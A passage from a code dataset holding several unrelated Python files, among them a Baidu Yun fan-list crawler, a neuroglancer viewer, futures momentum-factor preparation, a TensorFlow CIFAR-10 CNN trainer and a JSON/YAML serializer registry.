\"data/all.json\"\nall.serialize(destination=path, format='json-ld')\nall.serialize(destination=path.replace(\".json\", \".ttl\"), format='turtle')\nall.serialize(destination=path.replace(\".json\", \".rdf\"), format='xml')","sub_path":"src/301_rdf.py","file_name":"301_rdf.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"532863632","text":"#coding:utf-8\n\nfrom 
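__future__ import unicode_literals\n# note (editor): pages through a seed user's Baidu Yun fan list with Twisted's async getPage,\n# retrying failed URLs until the batch drains; results accumulate under the 'baidu' doc in MongoDB.\n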
from twisted.internet import defer, reactor\nfrom twisted.web.client import getPage\nfrom pymongo import MongoClient\nfrom time import time\nimport json\nimport logging\nimport re\n\ndb = MongoClient().sds\ndb.user.remove()\ndb.user.insert({'name':'baidu', 'list':[]})\n\nlogging.basicConfig(\n    level=logging.DEBUG,\n    filename='fans.log',\n    format='%(asctime)s [%(filename)s:%(lineno)d] %(levelname)s %(message)s',\n    filemode='w',\n)\n\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.DEBUG)\nformatter = logging.Formatter('[%(filename)s:%(lineno)d] %(levelname)s %(message)s')\nconsole.setFormatter(formatter)\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(console)\n\nURL = 'http://yun.baidu.com/pcloud/friend/getfanslist?query_uk={uk}&limit=24&start={start}'\ndb.user.update({'name':'baidu'}, {'name':'baidu', 'list':[]})\n\nstart = time()\n\ndef done(resp):\n    if resp is not None: logger.debug(resp)\n    reactor.stop()\n\ndef loop(resp, repeat, data, success, limit, turn, prepare, turn_limit):\n    logger.debug('total success: {}'.format(len(success) - len(data)))\n    logger.debug('total failure: {}'.format(len(data)))\n    if len(data) == 0:\n        if (turn is None) or (prepare is None) or (turn_limit is None):\n            logger.debug('cost time: {}'.format(time() - start))\n            reactor.stop()\n        else:\n            _data, _success = prepare(success)\n            turn(_data, _success, limit=turn_limit)\n    else:\n        logger.debug('repeat')\n        repeat(data, success, limit)\n\ndef fetch_fans(data, success, limit=None):\n    def gen_defer(url):\n        def callback(resp):\n            fans = json.loads(resp)\n            success[url] = [x['fans_uk'] for x in fans['fans_list']]\n            new_list = db.user.find_one({'name':'baidu'})['list'] + success[url]\n            db.user.update({'name':'baidu'}, {'name':'baidu', 'list':new_list})\n            data.remove(url)\n            logger.debug(success[url])\n\n        def errback(err):\n            logger.debug('[F] {}'.format(url))\n            data.remove(url)\n            data.append(url)\n\n        d = getPage(url.encode('utf-8'), timeout=15)\n        d.addCallbacks(callback, errback)\n\n        return d\n\n    dl = defer.DeferredList([gen_defer(url) for url in data[:limit]])\n    dl.addCallbacks(loop, callbackArgs=[fetch_fans, data, success, limit, None, None, None])\n\ndef fetch_total_count(data, success, limit=None):\n    def gen_defer(url):\n        def callback(resp):\n            fans = json.loads(resp)\n            success[url] = fans['total_count']\n            data.remove(url)\n            logger.debug(fans['total_count'])\n\n        def errback(err):\n            logger.debug('[F] {}'.format(url))\n            data.remove(url)\n            data.append(url)\n\n        d = getPage(url, timeout=15)\n        d.addCallbacks(callback, errback)\n\n        return d\n\n    def prepare(_success):\n        _data = []\n        for url, total_count in _success.items():  # fixed: dict.iteritems() is Python 2 only; items() works in both\n            if total_count > 0:\n                uk = re.findall(r'query_uk=(\\d+)', url)[0]\n                _data.extend([URL.format(uk=uk, start=start)\n                              for start in range(0, total_count, 24)])\n\n        _success = {x: None for x in _data}\n        return _data, _success\n\n    dl = defer.DeferredList([gen_defer(url) for url in data])\n    dl.addCallbacks(loop, callbackArgs=[fetch_total_count, data, success, limit, fetch_fans, prepare, 10])\n\n# data = [URL.format(uk=1208824379, start=0).encode('utf-8')]\ndata = [URL.format(uk=856454119, start=0).encode('utf-8')]\nlogger.debug(data)\nsuccess = {x: {} for x in data}\nfetch_total_count(data, success)\n# fetch_total_count(data, success)\n# fetch_total_count(data, 
success)\n\nreactor.run()\n","sub_path":"fans.py","file_name":"fans.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"291443266","text":"# -*- coding: UTF-8 -*-\nimport logging\nfrom GLOBALS import *\n\n\nclass Style:\n\n def __init__(self):\n pass\n\n RED = '\\033[31m'\n GREEN = '\\033[32m'\n YELLOW = '\\033[33m'\n BOLD = '\\033[1m'\n\n RESET = '\\033[0m'\n\n\nclass Logger:\n\n # LOG_FILE = '../utils/logs/testlogs.log'\n logger = logging.getLogger(LOG_FILE)\n ch = logging.StreamHandler()\n fh = logging.FileHandler(LOG_FILE)\n\n def __init__(self):\n self.logger.setLevel(logging.INFO)\n self.ch.setLevel(logging.INFO)\n\n # create formatter\n formatter = logging.Formatter('%(asctime)s - %(levelname)s: %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\n\n # add formatter to ch\n self.ch.setFormatter(formatter)\n self.fh.setLevel(logging.INFO)\n self.fh.setFormatter(formatter)\n\n # add ch to logs\n self.logger.addHandler(self.ch)\n self.logger.addHandler(self.fh)\n\n def get_logger(self):\n return self.logger\n\n\ndef info(logger, message):\n logger.info(message)\n\n\ndef error(logger, message):\n logger.error(Style.BOLD + Style.YELLOW + message + Style.RESET)\n","sub_path":"utils/logs/testlogger.py","file_name":"testlogger.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"471239686","text":"\nimport sys\ninput = sys.stdin.readline\n\nA, B = map(int, input().split())\nN, M = map(int, input().split())\nD = {'S': 0, 'E': 1, 'N': 2, 'W': 3}\ndx, dy = (-1, 0, 1, 0), (0, 1, 0, -1)\nw = [[0]*(A+1) for _ in range(B+1)]\nr = [[0, 0, 0] for _ in range(N+1)]\n\ndef solve(i, d, c):\n x, y, z = r[i]\n w[x][y] = 0\n for _ in range(c):\n if d == 'L':\n z = (z+1)%4\n elif d == 'R':\n z = (z+3)%4\n else:\n x, y = x+dx[z], y+dy[z]\n if x < 1 or x > B or y < 1 or y > A:\n print(\"Robot %d crashes into the wall\" % i)\n return True\n if w[x][y]:\n print(\"Robot %d crashes into robot %d\" % (i, w[x][y]))\n return True\n r[i] = x, y, z\n w[x][y] = i\n return False\n\nfor i in range(1, N+1):\n x, y, z = input().split()\n w[int(y)][int(x)] = i\n r[i] = [int(y), int(x), D[z]]\ncrash = False\nfor _ in range(M):\n i, d, c = input().split()\n if not crash:\n crash = solve(int(i), d, int(c))\nif not crash:\n print(\"OK\")\n","sub_path":"boj/boj_2174.py","file_name":"boj_2174.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"544908405","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\n\nimport webbrowser\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport h5py\nimport neuroglancer\nimport dxchange\nimport argparse\nimport os, signal\nimport re\nfrom .reader import omni_read\nfrom ast import literal_eval as make_tuple\n\ndef glance(viewer, image=None, labels=None, resolution=None):\n with viewer.txn() as s:\n s.voxel_size = resolution\n if image is not None:\n s.layers.append(\n name='image',\n layer=neuroglancer.LocalVolume(\n data=image,\n offset = (0,0,0),\n voxel_size = s.voxel_size,\n ),\n shader=\"\"\"\n void main() {\n emitRGB(vec3(toNormalized(getDataValue(0)),\n toNormalized(getDataValue(1)),\n toNormalized(getDataValue(2))));\n }\n \"\"\"),\n if labels is not None:\n s.layers.append(\n name='labels',\n layer=neuroglancer.LocalVolume(\n data=labels,\n offset = (0,0,0),\n 
voxel_size = s.voxel_size,\n                ),\n            )\n    return viewer.get_viewer_url()\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument( '--image', default=None)\n    parser.add_argument( '--labels', default=None)\n    parser.add_argument( '--multi', default=False)\n    parser.add_argument( '--begin', type=int, default=None)\n    parser.add_argument( '--end', type=int, default=None)\n    parser.add_argument( '--resolution', type=str, default='600,600,600')\n    parser.add_argument( '--p', type=int, default=42000 )\n    args = parser.parse_args()\n\n    image = omni_read(args.image, args.begin, args.end)\n    labels = omni_read(args.labels, args.begin, args.end)\n    #resolution = make_tuple(args.resolution)\n    resolution = tuple(int(d) for d in args.resolution.split(','))\n\n    if image.dtype == np.float32:\n        print('not 8bit')\n        image = image * 255\n    if labels is not None:\n        if not args.multi:\n            # only a single object\n            labels = np.uint32(np.nan_to_num(labels)>0)\n        else:\n            labels = np.uint32(np.nan_to_num(labels))\n    neuroglancer.set_server_bind_address(bind_address='127.0.0.1', bind_port=args.p)\n    viewer = neuroglancer.Viewer()\n    def dummy():\n        print('hello callback')\n    #viewer.defer_callback(dummy)\n    url = glance(viewer=viewer, image=image, labels=labels, resolution=resolution)\n    print(url)\n    webbrowser.open_new_tab(url)\n\n\n    def signal_handler(signal, frame):\n        print('You pressed Ctrl+C!')\n        sys.exit(0)\n    signal.signal(signal.SIGINT, signal_handler)\n    print('Press Ctrl+C')\n    signal.pause()\n\nif __name__ == '__main__':\n    main()","sub_path":"KLab_Utils/neuroglance_raw.py","file_name":"neuroglance_raw.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"146498045","text":"#!/usr/bin/python\n# Filename:Exercise_Function.py\n\ndef sayHello():\n\tprint ('Hello')\n\nsayHello()\n\ndef printMax(a,b):\n\tif a>b:\n\t\tprint ('Max Number is ',a)\n\telse:\n\t\tprint ('Max Number is ',b)\n\n\nnumA = int(input('Print a Number \\n'))\n\nnumB = int(input('Print a Number \\n'))\n\nprintMax(numA,numB)\n\ndef SetValue(a):\n\ta = 50\n\tprint ('Value is ',a)\n\nnumber = 70\n\nSetValue(number)\n\nprint ('Number is ',number)\n\nx = 70\n\ndef SetValueNa():\n\tglobal x\n\tx = 50\n\tprint (x)\n\nSetValueNa()\n\nprint ('x is ',x)","sub_path":"Exercise_Function.py","file_name":"Exercise_Function.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"314712107","text":"import os\nimport pandas as pd\nimport numpy as np\nimport tushare as ts\nfrom matplotlib import pyplot as plt\nfrom talib import MOM\nfrom utils.common import get_file_list\nfrom pandas import DataFrame\nfrom data_feed.tushare_feed import get_cal_date\n\n\nfather_dir = os.path.abspath(os.path.dirname(os.getcwd()))  # parent directory\ngrandfather_dir = os.path.abspath(os.path.join(os.getcwd(), \"../..\"))  # grandparent directory\nDCE_path = os.path.join(father_dir, 'data', 'tushare', 'DCE\\\\')\nSHF_path = os.path.join(father_dir, 'data', 'tushare', 'SHF\\\\')\nZCE_path = os.path.join(father_dir, 'data', 'tushare', 'ZCE\\\\')\nprices_path = os.path.join(father_dir, 'data', 'prices\\\\')\nfactors_path = os.path.join(father_dir, 'data', 'factors\\\\')\n\n# data = pd.read_csv(os.path.join(data_path, 'SHF\\\\', 'FU.SHF_20180102-20210528_daily.csv'))\n# data['trade_date'] = pd.to_datetime(data['trade_date'], format='%Y%m%d')\n# data = data.sort_values(by='trade_date', ascending=True)\n# data = 
data.set_index(data['trade_date'])\n# data = data.drop(columns=['Unnamed: 0', 'trade_date'])\n# data['mom'] = MOM(data.pre_close, 5)\n# print(data.index)\n\n# # build the MultiIndex\n# # https://blog.csdn.net/sinat_26811377/article/details/98469964\n# date_idx = [val for val in factor_val.index for i in range(len(factor_val.columns))]\n# asset_idx = factor_val.columns.to_list() * len(factor_val.index)\n# # print(factor_val.columns)\n# # print(asset_idx)\n# # print(len(date_idx), len(asset_idx))\n# # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.MultiIndex.html\n# multi_idx = pd.MultiIndex.from_arrays([date_idx, asset_idx], names=('trade_date', 'asset'))\n# print(multi_idx)\n\n# # alphalens accepts no index other than a daily DatetimeIndex\n# prices = pd.read_csv('prices.csv', parse_dates=True, index_col=['date'])\n# zz = pd.read_csv('000905.SH.csv', parse_dates=True, index_col=['date_time'])\n# lens = prices.shape[0]\n# new_idx = zz.index[:lens]\n# prices['date'] = new_idx\n# prices.set_index('date', inplace=True)\n# prices.to_csv('prices.csv')\n# # print(prices.head())\n\n\ndef union_tushare_data(path_list, start: str, end: str, trade_cal: DataFrame):\n    ser_l, files = [], []\n    for path in path_list:\n        files += get_file_list(path, [])\n    for f in files:\n        symbol = f.split('\\\\')[-1].split('.')[0]\n        date_range = f.split('\\\\')[-1].split('.')[1].split('_')[1]\n        b, e = date_range.split('-')[0], date_range.split('-')[1]\n        if (b == start) & (e == end):\n            temp = pd.read_csv(f)\n            temp.rename(columns={'trade_date': 'date'}, inplace=True)\n            temp['date'] = pd.to_datetime(temp['date'], format='%Y-%m-%d')\n            temp = temp.sort_values(by='date', ascending=True)\n            temp = temp.set_index(temp['date'])\n            ser = temp['close_adj']\n            ser.rename(symbol, inplace=True)\n            if ser.size == trade_cal.shape[0]:\n                ser_l.append(ser)\n                print(f'{symbol} appended.')\n            elif ser.size != trade_cal.shape[0]:\n                print(f'{symbol} k_line len: {ser.size}, cal len: {trade_cal.shape[0]}, dropped.')\n    df = pd.concat(ser_l, axis=1)\n    return df\n\n\ndef gen_multi_index_factors(factors: DataFrame):\n    factors = factors.T\n    factors['asset'] = factors.index\n    factors = factors.T\n    factors = factors[:-1]\n    row_L = []\n    for i in factors.index:\n        row = factors.loc[i]\n        row = pd.DataFrame(row)\n        row['date'] = row.columns[0]\n        row.rename(columns={row.columns[0]: 'factor_value'}, inplace=True)\n        row['asset'] = row.index\n        row = row.reindex(columns=['date', 'asset', 'factor_value'])\n        row_L.append(row)\n    factor_mi = pd.concat(row_L)\n    factor_mi.fillna(0, inplace=True)\n\n    # https://stackoverflow.com/questions/42236701/turn-columns-into-multi-level-index-pandas\n    factor_mi = factor_mi.set_index(['date', 'asset'], drop=True)\n    # print(factor_mi.index.levels)\n    # factor_mi = pd.Series(factor_mi['factor_value'].values, index=factor_mi.index)\n\n    return factor_mi\n\n\n\"\"\"https://zhuanlan.zhihu.com/p/68613067\"\"\"\n\n\ndef winsor_data(data):\n    q = data.quantile([0.02, 0.98])\n    data[data < q.iloc[0]] = q.iloc[0]\n    data[data > q.iloc[1]] = q.iloc[1]\n    return data\n\n\n# data normalization\ndef MaxMinNormal(data):\n    \"\"\"[0,1] normalization\"\"\"\n    x = (data - data.min()) / (data.max() - data.min())\n    return x\n\n\nif __name__ == '__main__':\n    start, end = '20180102', '20210601'\n    trade_cal = get_cal_date(start, end)\n\n    # save the unified price file\n    prices = union_tushare_data([DCE_path, SHF_path, ZCE_path], start=start, end=end, trade_cal=trade_cal)\n    prices.to_csv(os.path.join(prices_path, 'prices.csv'))\n\n    # generate the factor values\n    L = []\n    for col in prices.columns:\n        # X = MOM(prices[col], 5)\n
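        # note (editor): 5-session log momentum, X_t = ln(P_t / P_{t-5}); e.g. a 5% rise over\n        # five sessions gives X of about 0.0488 -- an illustrative value, not from the dataset.\n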
        # as written this is a momentum factor; adding a minus sign turns it into a reversal factor\n        X = np.log(prices[col] / prices[col].shift(5))\n        X.name = col\n        L.append(X)\n    factors = pd.concat(L, axis=1)\n\n    # build the factor-value file with a double index ['date', 'asset']\n    factors = gen_multi_index_factors(factors)\n    factors.to_csv(os.path.join(factors_path, 'factors.csv'))\n\n    # factor normalization; for CTA strategies, do not clip the extremes\n    # factors_new = factors['factor_value'].groupby('date').apply(winsor_data)\n    factors_new = factors.groupby('date').apply(MaxMinNormal)\n    factors_new.hist(figsize=(12, 6), bins=20)\n    factors_new.to_csv(os.path.join(factors_path, 'factors_new.csv'))\n    plt.show()\n\n    # res.dropna(inplace=True)\n    # factor_cols = list(filter(lambda x: 'MOM' in x, res.columns.tolist()))\n    # factor = res[factor_cols]\n    # res = res.set_index([index_a, index_b])\n","sub_path":"data_feed/prepare_for_alphalens.py","file_name":"prepare_for_alphalens.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"404724772","text":"import pickle\nimport os\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom layers import conv_layer, max_pool_2x2, full_layer\n\n\nDATA_PATH = \"C:/github_base/Oreilly-Learning-TensorFlow/data_dir/cifar_data\"\nBATCH_SIZE = 50\n#BATCH_SIZE = 70\n#STEPS = 500000\n#STEPS = 300000\nSTEPS = 2000\n\ndef one_hot(vec, vals=10):\n    n = len(vec)\n    out = np.zeros((n, vals))\n    out[range(n), vec] = 1\n    return out\n\ndef unpickle(file):\n    with open(os.path.join(DATA_PATH, file), 'rb') as fo:\n        u = pickle._Unpickler(fo)\n        u.encoding = 'latin1'\n        dict = u.load()\n    return dict\n\ndef display_cifar_sorted(images, labels, size):\n    # print('labels shape is', labels.shape)\n    # print('np.argwhere(labels==2) shape ', np.argwhere(labels==2).shape)\n    # print('shape2 is ', np.random.choice(np.argwhere(labels == 2).ravel(), 10))\n    n = len(images)\n    plt.figure()\n    plt.gca().set_axis_off()\n    im = np.vstack([np.hstack(images[np.random.choice(np.argwhere(labels==i).ravel(), 10)])\n                    for i in range(size)])\n    # print('im shape ', im.shape)\n    plt.imshow(im)\n    plt.show()\n\ndef display_cifar(images, size):\n    n = len(images)\n    plt.figure()\n    plt.gca().set_axis_off()\n    im = np.vstack([np.hstack([images[np.random.choice(n)] for i in range(size)])\n                    for i in range(size)])\n    plt.imshow(im)\n    plt.show()\n\ndef plot_accuracy(iter_list, test_accuracy_list, train_accuracy_list=None):\n    import matplotlib.pyplot as plt\n    plt.plot(iter_list, test_accuracy_list, color='red', label='test accuracy')\n    if train_accuracy_list:\n        plt.plot(iter_list, train_accuracy_list, color='blue', label='train accuracy')\n    plt.legend()\n    plt.xlabel('iter num')\n    plt.ylabel('accuracy')\n    plt.show()\n\n\nclass CifarLoader(object):\n    \"\"\"\n    Load and manage the CIFAR dataset.\n    (for any practical use there is no reason not to use the built-in dataset handler instead)\n    \"\"\"\n    def __init__(self, source_files):\n        self._source = source_files\n        self._i = 0\n        self.images = None\n        self.labels = None\n        self.raw_labels = None\n\n    def load(self):\n        data = [unpickle(f) for f in self._source]\n        images = np.vstack([d[\"data\"] for d in data])\n        n = len(images)\n        self.images = images.reshape(n, 3, 32, 32).transpose(0, 2, 3, 1)\\\n            .astype(float) / 255\n        self.raw_labels = np.hstack([d[\"labels\"] for d in data])\n        self.labels = one_hot(np.hstack([d[\"labels\"] for d in data]), 10)\n        return self\n\n    def next_batch(self, batch_size):\n        x, y = self.images[self._i:self._i+batch_size], \\\n               self.labels[self._i:self._i+batch_size]\n        self._i = (self._i + 
batch_size) % len(self.images)\n        return x, y\n\n    def random_batch(self, batch_size):\n        n = len(self.images)\n        ix = np.random.choice(n, batch_size)\n        return self.images[ix], self.labels[ix]\n\n\nclass CifarDataManager(object):\n    def __init__(self):\n        self.train = CifarLoader([\"data_batch_{}\".format(i) for i in range(1, 6)])\\\n            .load()\n        self.test = CifarLoader([\"test_batch\"]).load()\n\n\ndef run_simple_net():\n    print('get into run_simple_net')\n    cifar = CifarDataManager()\n\n    x = tf.placeholder(tf.float32, shape=[None, 32, 32, 3])\n    y_ = tf.placeholder(tf.float32, shape=[None, 10])\n    keep_prob = tf.placeholder(tf.float32)\n\n    conv1 = conv_layer(x, shape=[5, 5, 3, 32])\n    conv1_pool = max_pool_2x2(conv1)\n\n    print('get into run_simple_net 111')\n\n    conv2 = conv_layer(conv1_pool, shape=[5, 5, 32, 64])\n    conv2_pool = max_pool_2x2(conv2)\n\n    # conv3 = conv_layer(conv2_pool, shape=[5, 5, 64, 128])\n    conv3 = conv_layer(conv2_pool, shape=[5, 5, 64, 100])\n    conv3_pool = max_pool_2x2(conv3)\n\n    conv4 = conv_layer(conv3_pool, shape=[5, 5, 100, 256])\n    conv4_pool = max_pool_2x2(conv4)\n    print('conv4_pool.get_shape() is ', conv4_pool.get_shape())\n    #conv4_flat = tf.reshape(conv4_pool, [-1, 4 * 4 * 256])\n    conv4_flat = tf.reshape(conv4_pool, [-1, 2 * 2 * 256])\n    conv4_drop = tf.nn.dropout(conv4_flat, keep_prob=keep_prob)\n\n    print('get into run_simple_net 222')\n\n    full_1 = tf.nn.relu(full_layer(conv4_drop, 512))\n    full1_drop = tf.nn.dropout(full_1, keep_prob=keep_prob)\n\n    y_conv = full_layer(full1_drop, 10)\n\n    cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv,\n                                                                           labels=y_))\n    train_step = tf.train.AdamOptimizer(1e-3).minimize(cross_entropy)\n\n    correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n    def test(sess):\n        X = cifar.test.images.reshape(10, 1000, 32, 32, 3)\n        Y = cifar.test.labels.reshape(10, 1000, 10)\n        acc = np.mean([sess.run(accuracy, feed_dict={x: X[i], y_: Y[i], keep_prob: 1.0})\n                       for i in range(10)])\n        #print(\"test accuracy: {:.4}%\".format(acc * 100))\n        return acc\n\n    print('get into run_simple_net 333')\n    iter_list, test_accuracy_list, train_accuracy_list = [], [], []\n    with tf.Session() as sess:\n        sess.run(tf.global_variables_initializer())\n\n        for i in range(STEPS):\n            #batch = cifar.train.next_batch(BATCH_SIZE)\n            batch = cifar.train.random_batch(BATCH_SIZE)\n            sess.run(train_step, feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n\n            if i % 500 == 0:\n                iter_list.append(i)\n                # fixed: disable dropout (keep_prob=1.0) when measuring accuracy; 0.5 biases the estimate\n                train_acc = np.mean([sess.run(accuracy,\n                                              feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})\n                                     for _ in range(10)])\n                train_accuracy_list.append(train_acc)\n                test_acc = test(sess)\n                test_accuracy_list.append(test_acc)\n\n                print('step i:{0:6} train_acc: {1:.6f} test_acc: {2:.6f}'.format(\n                    i, train_acc, test_acc))\n\n        test(sess)\n        plot_accuracy(iter_list, test_accuracy_list, train_accuracy_list)\n\n\ndef build_second_net():\n    cifar = CifarDataManager()\n    print('in build_second_net 111')\n\n    x = tf.placeholder(tf.float32, shape=[None, 32, 32, 3])\n    y_ = tf.placeholder(tf.float32, shape=[None, 10])\n    keep_prob = tf.placeholder(tf.float32)\n\n    C1, C2, C3 = 32, 64, 128\n    F1 = 600\n\n    conv1_1 = conv_layer(x, shape=[3, 3, 3, C1])\n    conv1_2 = conv_layer(conv1_1, shape=[3, 3, C1, C1])\n    conv1_3 = conv_layer(conv1_2, shape=[3, 3, C1, C1])\n    conv1_pool = max_pool_2x2(conv1_3)\n    conv1_drop = tf.nn.dropout(conv1_pool, keep_prob=keep_prob)\n\n    print('in build_second_net 222')\n\n    conv2_1 = 
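conv_layer(conv1_drop, shape=[3, 3, C1, C2])\n    # note (editor): three stacked 3x3 convs per block (VGG-style) cover a 7x7 receptive field\n    # with fewer parameters and more nonlinearities than a single 7x7 kernel would.\n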
conv_layer(conv1_drop, shape=[3, 3, C1, C2])\n conv2_2 = conv_layer(conv2_1, shape=[3, 3, C2, C2])\n conv2_3 = conv_layer(conv2_2, shape=[3, 3, C2, C2])\n conv2_pool = max_pool_2x2(conv2_3)\n conv2_drop = tf.nn.dropout(conv2_pool, keep_prob=keep_prob)\n\n \n\n print('in build_second_net 333')\n\n conv3_1 = conv_layer(conv2_drop, shape=[3, 3, C2, C3])\n conv3_2 = conv_layer(conv3_1, shape=[3, 3, C3, C3])\n conv3_3 = conv_layer(conv3_2, shape=[3, 3, C3, C3])\n conv3_pool = tf.nn.max_pool(conv3_3, ksize=[1, 8, 8, 1], strides=[1, 8, 8, 1], padding='SAME')\n conv3_flat = tf.reshape(conv3_pool, [-1, C3])\n conv3_drop = tf.nn.dropout(conv3_flat, keep_prob=keep_prob)\n\n full1 = tf.nn.relu(full_layer(conv3_drop, F1))\n full1_drop = tf.nn.dropout(full1, keep_prob=keep_prob)\n\n y_conv = full_layer(full1_drop, 10)\n\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv,\n labels=y_))\n train_step = tf.train.AdamOptimizer(5e-4).minimize(cross_entropy) # noqa\n\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # noqa\n\n # Plug this into the test procedure as above to continue...\n def test(sess):\n X = cifar.test.images.reshape(10, 1000, 32, 32, 3)\n Y = cifar.test.labels.reshape(10, 1000, 10)\n acc = np.mean([sess.run(accuracy, feed_dict={x: X[i], y_: Y[i], keep_prob: 1.0})\n for i in range(10)])\n #print(\"Accuracy: {:.4}%\".format(acc * 100))\n return acc\n\n print('get into run_simple_net 333')\n iter_list, test_accuracy_list, train_accuracy_list = [], [], []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for i in range(STEPS):\n #print('i is ', i)\n #batch = cifar.train.next_batch(BATCH_SIZE)\n batch = cifar.train.random_batch(BATCH_SIZE)\n sess.run(train_step, feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n\n if i % 500 == 0 or i==STEPS-1:\n iter_list.append(i)\n train_acc = sess.run(accuracy, feed_dict={x: batch[0],\n y_: batch[1],\n keep_prob: 0.5})\n train_accuracy_list.append(train_acc)\n test_acc = test(sess)\n test_accuracy_list.append(test_acc)\n print(\n 'step i:{0:7} train_acc: {1:.6f} test_acc: {2:.6f}'.format(\n i, train_acc, test_acc))\n\n test(sess)\n plot_accuracy(iter_list, test_accuracy_list, train_accuracy_list)\n\n\ndef create_cifar_image():\n d = CifarDataManager()\n print(\"Number of train images: {}\".format(len(d.train.images)))\n print(\"Number of train labels: {}\".format(len(d.train.labels)))\n print(\"Number of test images: {}\".format(len(d.test.images)))\n print(\"Number of test labels: {}\".format(len(d.test.labels)))\n images = d.train.images\n labels = d.train.labels\n raw_labels = d.train.raw_labels\n #display_cifar(images, 10)\n #display_cifar_sorted(images, raw_labels, 10)\n\n\nif __name__ == \"__main__\":\n start_t = time.time()\n create_cifar_image()\n #run_simple_net()\n build_second_net()\n print('total cost time ', time.time()-start_t)\n","sub_path":"04__convolutional_neural_networks/cifar_cnn.py","file_name":"cifar_cnn.py","file_ext":"py","file_size_in_byte":10222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"413142495","text":"\"\"\"\nSerialization methods.\n\"\"\"\n\nimport abc\nimport json\nimport os\nfrom enum import Enum\nfrom typing import Dict, Union\n\nimport yaml\nfrom pydantic import BaseModel\n\nfrom .exceptions import UnsupportedFiletypeError\n\n__all__ = [\n \"Serializer\",\n \"DeSerializer\",\n \"register_serializer\",\n 
\"register_deserializer\",\n \"serialize\",\n \"deserialize\",\n]\n\nserializers = {}\ndeserializers = {}\n\n\nclass DataType(str, Enum):\n \"\"\"\n The type of data the de/serializers deal with, which helps with file loading.\n \"\"\"\n\n TEXT = \"\"\n BYTES = \"b\"\n\n\nclass GeneralSerializer(BaseModel):\n\n data_type: DataType\n\n class Config:\n allow_mutation = False\n extra = \"forbid\"\n\n\nclass Serializer(GeneralSerializer, abc.ABC):\n @abc.abstractmethod\n def serialize(self, serializable: Dict) -> Union[str, bytes]:\n \"\"\"\n The method should give the string representation of the serialization ready for dumping to file.\n \"\"\"\n raise NotImplementedError()\n\n\nclass DeSerializer(GeneralSerializer, abc.ABC):\n @abc.abstractmethod\n def deserialize(self, file_object) -> Dict:\n \"\"\"\n The method should return a dict representation that the pydantic models can be built from.\n \"\"\"\n raise NotImplementedError()\n\n\nclass JsonSerializer(Serializer):\n data_type = DataType.TEXT\n\n def serialize(self, serializable) -> str:\n return json.dumps(serializable, indent=2)\n\n\nclass YamlSerializer(Serializer):\n data_type = DataType.TEXT\n\n def serialize(self, serializable) -> str:\n return yaml.dump(serializable)\n\n\nclass JsonDeSerializer(DeSerializer):\n data_type = DataType.TEXT\n\n def deserialize(self, file_object) -> Dict:\n return json.load(file_object)\n\n\nclass YamlDeSerializer(DeSerializer):\n data_type = DataType.TEXT\n\n def deserialize(self, file_object) -> Dict:\n return yaml.full_load(file_object)\n\n\ndef register_serializer(format_name: str, serializer: \"Serializer\") -> None:\n \"\"\"\n Register a new serializer method with qcsubmit.\n \"\"\"\n if format_name.lower() in serializers.keys():\n raise ValueError(f\"{format_name} already has a serializer registered.\")\n\n serializers[format_name.lower()] = serializer\n\n\ndef register_deserializer(format_name: str, deserializer: DeSerializer) -> None:\n \"\"\"\n Register a new deserializer method with qcsubmit.\n \"\"\"\n if format_name.lower() in deserializers.keys():\n raise ValueError(f\"{format_name} already has a deserializer registered.\")\n\n deserializers[format_name] = deserializer\n\n\ndef unregister_serializer(format_name: str) -> None:\n \"\"\"\n Remove one of the registered serializers with qcsubmit.\n \"\"\"\n method = serializers.pop(format_name.lower(), None)\n if method is None:\n raise KeyError(f\"The serializer {format_name} is not registered\")\n\n\ndef unregister_deserializer(format_name: str) -> None:\n \"\"\"\n Remove one of the registered deserializers with qcsubmit.\n \"\"\"\n method = deserializers.pop(format_name.lower(), None)\n if method is None:\n raise KeyError(f\"The deserializer {format_name} is not registered.\")\n\n\ndef get_serializer(format_name: str) -> \"Serializer\":\n \"\"\"\n Return the requested serializer class.\n \"\"\"\n serializer = serializers.get(format_name.lower(), None)\n if serializer is None:\n raise UnsupportedFiletypeError(\n f\"The specified serialization format {format_name} is not supported; \"\n f\"supported formats are {serializers.keys()}\"\n )\n return serializer()\n\n\ndef get_deserializer(format_name: str) -> \"DeSerializer\":\n \"\"\"\n Return the requested deserializer class.\n 